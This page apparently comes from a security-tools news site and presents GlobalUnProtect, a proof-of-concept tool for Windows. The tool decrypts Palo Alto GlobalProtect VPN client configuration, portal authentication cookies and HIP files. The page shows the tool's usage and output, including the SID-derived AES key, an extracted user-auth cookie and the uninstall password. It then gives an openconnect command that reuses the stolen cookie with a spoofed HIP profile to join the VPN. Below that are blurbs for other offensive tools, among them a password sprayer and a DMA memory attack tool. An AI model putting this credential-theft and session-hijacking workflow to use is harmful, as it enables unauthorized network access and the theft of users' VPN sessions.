PoC tool for decrypting and collecting GlobalProtect configuration, cookies, and HIP files from windows client installations.
Run as standalone or in-memory via execute-assembly or equivalent. Collects all contents to an in-memory zip and writes to specified location.
> GlobalUnProtect.exe
Usage: GlobalUnProtect.exe C:\Path\To\Output.zip> GlobalUnProtect.exe %TEMP%\GPUnprotect.zip
[*] Deriving AES key from computer SID
[*] Computer SID (Hex) : 010400000000000515000000EFC8897F22AF1E09042DC851
[*] Derived AES Key: C41006BCDBEF6683B2E7387EA9487A77C41006BCDBEF6683B2E7387EA9487A77
[*] Starting search for GlobalProtect data files
[*] Found: C:\Users\User\AppData\Local\Palo Alto Networks\GlobalProtect\PanPCD_2ab96390c7dbe3439de74d0c9b0b1767.dat
[*] Found: C:\Users\User\AppData\Local\Palo Alto Networks\GlobalProtect\PanPortalCfg_2ab96390c7dbe3439de74d0c9b0b17676.dat
[*] Found: C:\Users\User\AppData\Local\Palo Alto Networks\GlobalProtect\PanPUAC_2ab96390c7dbe3439de74d0c9b0b1767.dat
[*] PanPortalCfg_2ab96390c7dbe3439de74d0c9b0b1767.dat looks like a portal config file, parsing for convenience:
[*] User Name: example\user
[*] Portal: vpn.example.com
[*] User Domain: example
[*] Portal Name:
[*] Tenant Id: 100001
[*] Uninstall password: uninstall-password
[*] Portal Pre-logon Cookie: empty
[*] Portal User-auth Cookie: NzFkZjM0NGJlNjQ0NGEyMzQyMDQ4MmY3ZWE1ZWY1Y2ZhN2FiNTEyNDg0OTJhNWI0NTlhNjkzZjNmMDE2MTYzNzAyMjAzNWE2MGY0Y2I0YmVlMWIyNzExNGYzMTQwYTA5YTY3MTFjNDQ2MmQ3MjQ4NTE5MDEzYzU1OWQ4MzgwYjU=
[*] Collecting HIP profile data files
[*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_AM_Report_V4.dat
[*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_BC_Report_V4.dat
[*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_DE_Report_V4.dat
[*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_DLP_Report_V4.dat
[*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_FW_Report_V4.dat
[*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HIP_PM_Report_V4.dat
[*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\HipPolicy.dat
[*] Found: C:\Program Files\Palo Alto Networks\GlobalProtect\PanGpHip.log
[*] Writing output ZIP file to C:\Users\User\AppData\Local\Temp\GPUnprotect.zipConnect via OpenConnect:
$ sudo openconnect --protocol=gp --user="example\\username" --usergroup=portal:portal-userauthcookie --os=win https://vpn.example.com --csd-wrapper ~/tools/custom-hips-profile.shConfuserEx2 is the latest version from the Confuser family → An open-source, free protector for…
The v7.3.0 capa release comes with the following three major enhancements: 1. Support For VMRay…
MSSprinkler is a password spraying utility for organizations to test their M365 accounts from an…
Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can…
NyxInvoke is a versatile Rust-based tool designed for executing .NET assemblies, PowerShell commands/scripts, and Beacon…
You've heard about Rust, but you never had the chance to try it out?This course…